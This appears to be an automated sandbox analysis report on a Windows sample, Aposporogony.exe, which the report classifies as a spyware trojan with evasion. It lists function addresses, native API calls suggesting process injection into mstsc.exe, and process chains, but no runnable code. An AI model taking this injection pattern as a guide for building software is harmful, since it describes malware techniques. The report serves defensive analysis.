      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8C58704_2_1D8C5870
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8C4BC04_2_1D8C4BC0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D88DB194_2_1D88DB19
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D850B104_2_1D850B10
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D90FB2E4_2_1D90FB2E
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D90FA894_2_1D90FA89
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D86FAA04_2_1D86FAA0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D90CA134_2_1D90CA13
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D90EA5B4_2_1D90EA5B
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D9075C64_2_1D9075C6
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D90F5C94_2_1D90F5C9
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8BD4804_2_1D8BD480
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8504454_2_1D850445
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D84170C4_2_1D84170C
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D9067574_2_1D906757
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8527604_2_1D852760
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D85A7604_2_1D85A760
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8C36EC4_2_1D8C36EC
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D84C6E04_2_1D84C6E0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D90F6F64_2_1D90F6F6
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8ED62C4_2_1D8ED62C
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8FD6464_2_1D8FD646
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8746704_2_1D874670
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8551C04_2_1D8551C0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D86B1E04_2_1D86B1E0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D83F1134_2_1D83F113
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D91010E4_2_1D91010E
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8ED1304_2_1D8ED130
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D89717A4_2_1D89717A
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D88508C4_2_1D88508C
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8400A04_2_1D8400A0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D85B0D04_2_1D85B0D0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D9070F14_2_1D9070F1
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8FE0764_2_1D8FE076
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8413804_2_1D841380
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D85E3104_2_1D85E310
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D90F3304_2_1D90F330
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D83D2EC4_2_1D83D2EC
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D86D2104_2_1D86D210
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8122454_2_1D812245
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D90124C4_2_1D90124C
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_0168402B4_2_0168402B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_045F04456_2_045F0445
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0465D4806_2_0465D480
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_046AF5C96_2_046AF5C9
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_046A75C66_2_046A75C6
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_046146706_2_04614670
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0469D6466_2_0469D646
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0468D62C6_2_0468D62C
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_046636EC6_2_046636EC
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_046AF6F66_2_046AF6F6
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_045EC6E06_2_045EC6E0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_046A67576_2_046A6757
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_045F27606_2_045F2760
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_045FA7606_2_045FA760
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_045E170C6_2_045E170C
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0469E0766_2_0469E076
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_045FB0D06_2_045FB0D0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_046A70F16_2_046A70F1
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0462508C6_2_0462508C
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_045E00A06_2_045E00A0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0463717A6_2_0463717A
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_045DF1136_2_045DF113
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0468D1306_2_0468D130
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_046B010E6_2_046B010E
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0460B1E06_2_0460B1E0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_045F51C06_2_045F51C0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_046A124C6_2_046A124C
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0460D2106_2_0460D210
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_045DD2EC6_2_045DD2EC
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_045FE3106_2_045FE310
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_046AF3306_2_046AF330
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_045E13806_2_045E1380
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_046A6C696_2_046A6C69
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_046AEC606_2_046AEC60
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0469EC4C6_2_0469EC4C
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_045E0C126_2_045E0C12
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_045FAC206_2_045FAC20
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0460FCE06_2_0460FCE0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04677CE86_2_04677CE8
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04608CDF6_2_04608CDF
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04689C986_2_04689C98
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_046A7D4C6_2_046A7D4C
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_045F0D696_2_045F0D69
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_046AFD276_2_046AFD27
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_045EAD006_2_045EAD00
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_045F9DD06_2_045F9DD0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0468FDF46_2_0468FDF4
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04602DB06_2_04602DB0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04632E486_2_04632E48
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04610E506_2_04610E50
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_045E2EE86_2_045E2EE8
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_046A9ED26_2_046A9ED2
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_046A0EAD6_2_046A0EAD
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_045F1EB26_2_045F1EB2
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_046AFF636_2_046AFF63
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_045FCF006_2_045FCF00
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_046A1FC66_2_046A1FC6
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_046AEFBF6_2_046AEFBF
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0460B8706_2_0460B870
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_046658706_2_04665870
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_046AF8726_2_046AF872
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_045F98706_2_045F9870
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_045D68686_2_045D6868
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_045F38006_2_045F3800
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0461E8106_2_0461E810
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_046A78F36_2_046A78F3
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_045F28C06_2_045F28C0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_046A18DA6_2_046A18DA
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_046698B26_2_046698B2
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_046068826_2_04606882
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_046359C06_2_046359C0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_046AE9A66_2_046AE9A6
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_045EE9A06_2_045EE9A0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_046AEA5B6_2_046AEA5B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_046ACA136_2_046ACA13
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0460FAA06_2_0460FAA0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_046AFA896_2_046AFA89
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_046AFB2E6_2_046AFB2E
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_045F0B106_2_045F0B10
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0462DB196_2_0462DB19
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04664BC06_2_04664BC0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0040E7406_2_0040E740
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_004088806_2_00408880
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0042024C6_2_0042024C
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_004202896_2_00420289
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_004215246_2_00421524
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0041FA436_2_0041FA43
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0041FA466_2_0041FA46
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00420C296_2_00420C29
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00420CC26_2_00420CC2
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00409D106_2_00409D10
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00402D876_2_00402D87
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00402D906_2_00402D90
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00420EAD6_2_00420EAD
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00402FB06_2_00402FB0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 0466EF10 appears 90 times
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 0465E692 appears 83 times
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 045DB910 appears 187 times
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 04625050 appears 36 times
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 04637BE4 appears 86 times
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: String function: 1D897BE4 appears 86 times
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: String function: 1D8CEF10 appears 90 times
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: String function: 1D885050 appears 36 times
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: String function: 1D83B910 appears 187 times
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: String function: 1D8BE692 appears 84 times
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034A4F44 NtProtectVirtualMemory,0_2_034A4F44
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034A6172 NtOpenFile,0_2_034A6172
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034A52CD NtOpenFile,0_2_034A52CD
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D882DA0 NtReadVirtualMemory,LdrInitializeThunk,4_2_1D882DA0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D882DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_1D882DC0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D882D10 NtQuerySystemInformation,LdrInitializeThunk,4_2_1D882D10
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D882CF0 NtDelayExecution,LdrInitializeThunk,4_2_1D882CF0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D882C30 NtMapViewOfSection,LdrInitializeThunk,4_2_1D882C30
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D882C50 NtUnmapViewOfSection,LdrInitializeThunk,4_2_1D882C50
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D882F00 NtCreateFile,LdrInitializeThunk,4_2_1D882F00
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D882EB0 NtProtectVirtualMemory,LdrInitializeThunk,4_2_1D882EB0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D882ED0 NtResumeThread,LdrInitializeThunk,4_2_1D882ED0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D882E50 NtCreateSection,LdrInitializeThunk,4_2_1D882E50
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8829F0 NtReadFile,LdrInitializeThunk,4_2_1D8829F0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D882B90 NtFreeVirtualMemory,LdrInitializeThunk,4_2_1D882B90
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D882BC0 NtQueryInformationToken,LdrInitializeThunk,4_2_1D882BC0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D882B10 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_1D882B10
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8834E0 NtCreateMutant,LdrInitializeThunk,4_2_1D8834E0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D882D50 NtWriteVirtualMemory,4_2_1D882D50
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D883C90 NtOpenThread,4_2_1D883C90
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D882CD0 NtEnumerateKey,4_2_1D882CD0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D882C10 NtOpenProcess,4_2_1D882C10
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D882C20 NtSetInformationFile,4_2_1D882C20
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D883C30 NtOpenProcessToken,4_2_1D883C30
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D882FB0 NtSetValueKey,4_2_1D882FB0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D882F30 NtOpenDirectoryObject,4_2_1D882F30
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D882E80 NtCreateProcessEx,4_2_1D882E80
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D882EC0 NtQuerySection,4_2_1D882EC0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D882E00 NtQueueApcThread,4_2_1D882E00
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8829D0 NtWaitForSingleObject,4_2_1D8829D0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8838D0 NtGetContextThread,4_2_1D8838D0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D882B80 NtCreateKey,4_2_1D882B80
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D882BE0 NtQueryVirtualMemory,4_2_1D882BE0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D882B00 NtQueryValueKey,4_2_1D882B00
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D882B20 NtQueryInformationProcess,4_2_1D882B20
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D882A80 NtClose,4_2_1D882A80
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D882AA0 NtQueryInformationFile,4_2_1D882AA0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D882AC0 NtEnumerateValueKey,4_2_1D882AC0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D882A10 NtWriteFile,4_2_1D882A10
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D884570 NtSuspendThread,4_2_1D884570
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D884260 NtSetContextThread,4_2_1D884260
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_046234E0 NtCreateMutant,LdrInitializeThunk,6_2_046234E0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04622C30 NtMapViewOfSection,LdrInitializeThunk,6_2_04622C30
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04622CF0 NtDelayExecution,LdrInitializeThunk,6_2_04622CF0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04622D10 NtQuerySystemInformation,LdrInitializeThunk,6_2_04622D10
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04622DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_04622DC0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04622E50 NtCreateSection,LdrInitializeThunk,6_2_04622E50
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04622F00 NtCreateFile,LdrInitializeThunk,6_2_04622F00
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_046229F0 NtReadFile,LdrInitializeThunk,6_2_046229F0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04622A10 NtWriteFile,LdrInitializeThunk,6_2_04622A10
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04622AC0 NtEnumerateValueKey,LdrInitializeThunk,6_2_04622AC0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04622A80 NtClose,LdrInitializeThunk,6_2_04622A80
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04622B00 NtQueryValueKey,LdrInitializeThunk,6_2_04622B00
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04622B10 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_04622B10
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04622BC0 NtQueryInformationToken,LdrInitializeThunk,6_2_04622BC0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04622B80 NtCreateKey,LdrInitializeThunk,6_2_04622B80
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04622B90 NtFreeVirtualMemory,LdrInitializeThunk,6_2_04622B90
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04624570 NtSuspendThread,6_2_04624570
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04624260 NtSetContextThread,6_2_04624260
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04622C50 NtUnmapViewOfSection,6_2_04622C50
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04622C20 NtSetInformationFile,6_2_04622C20
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04623C30 NtOpenProcessToken,6_2_04623C30
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04622C10 NtOpenProcess,6_2_04622C10
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04622CD0 NtEnumerateKey,6_2_04622CD0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04623C90 NtOpenThread,6_2_04623C90
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04622D50 NtWriteVirtualMemory,6_2_04622D50
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04622DA0 NtReadVirtualMemory,6_2_04622DA0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04622E00 NtQueueApcThread,6_2_04622E00
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04622EC0 NtQuerySection,6_2_04622EC0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04622ED0 NtResumeThread,6_2_04622ED0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04622EB0 NtProtectVirtualMemory,6_2_04622EB0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04622E80 NtCreateProcessEx,6_2_04622E80
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04622F30 NtOpenDirectoryObject,6_2_04622F30
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04622FB0 NtSetValueKey,6_2_04622FB0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_046238D0 NtGetContextThread,6_2_046238D0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_046229D0 NtWaitForSingleObject,6_2_046229D0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04622AA0 NtQueryInformationFile,6_2_04622AA0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04622B20 NtQueryInformationProcess,6_2_04622B20
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04622BE0 NtQueryVirtualMemory,6_2_04622BE0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0041C760 NtCreateFile,6_2_0041C760
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0041C860 NtDeleteFile,6_2_0041C860
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0041C810 NtReadFile,6_2_0041C810
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0041C890 NtClose,6_2_0041C890
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0041C940 NtAllocateVirtualMemory,6_2_0041C940
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0041C75A NtCreateFile,6_2_0041C75A
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0041C85A NtDeleteFile,6_2_0041C85A
      Source: Aposporogony.exe, 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDomspraksis.exe: vs Aposporogony.exe
      Source: Aposporogony.exe, 00000004.00000000.1825149209.00000000004BB000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDomspraksis.exe: vs Aposporogony.exe
      Source: Aposporogony.exe, 00000004.00000003.2019169152.000000001D5CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Aposporogony.exe
      Source: Aposporogony.exe, 00000004.00000003.2215486777.000000001DC85000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemstsc.exej% vs Aposporogony.exe
      Source: Aposporogony.exe, 00000004.00000002.2246962172.000000001DAE0000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Aposporogony.exe
      Source: Aposporogony.exe, 00000004.00000003.2025337338.000000001D78C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Aposporogony.exe
      Source: Aposporogony.exe, 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Aposporogony.exe
      Source: Aposporogony.exe, 00000004.00000002.2242109670.000000001D732000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemstsc.exej% vs Aposporogony.exe
      Source: Aposporogony.exe, 00000004.00000003.2210470359.000000001D613000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemstsc.exej% vs Aposporogony.exe
      Source: Aposporogony.exeBinary or memory string: OriginalFilenameDomspraksis.exe: vs Aposporogony.exe
      Source: C:\Users\user\Desktop\Aposporogony.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Users\user\Desktop\Aposporogony.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: edgegdi.dllJump to behavior
      Source: Aposporogony.exeVirustotal: Detection: 9%
      Source: C:\Users\user\Desktop\Aposporogony.exeFile read: C:\Users\user\Desktop\Aposporogony.exeJump to behavior
      Source: Aposporogony.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\Aposporogony.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\Aposporogony.exe C:\Users\user\Desktop\Aposporogony.exe
      Source: C:\Users\user\Desktop\Aposporogony.exeProcess created: C:\Users\user\Desktop\Aposporogony.exe C:\Users\user\Desktop\Aposporogony.exe
      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
      Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
      Source: C:\Users\user\Desktop\Aposporogony.exeProcess created: C:\Users\user\Desktop\Aposporogony.exe C:\Users\user\Desktop\Aposporogony.exeJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
      Source: C:\Users\user\Desktop\Aposporogony.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: Whiteshank.lnk.0.drLNK file: ..\..\..\..\Public\Videos\Undisputatious\Octastylos191\Overabundant92.rev
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A5
      Source: C:\Users\user\Desktop\Aposporogony.exeFile created: C:\Users\user\AppData\Local\Temp\nscC1C.tmpJump to behavior
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/7@21/18
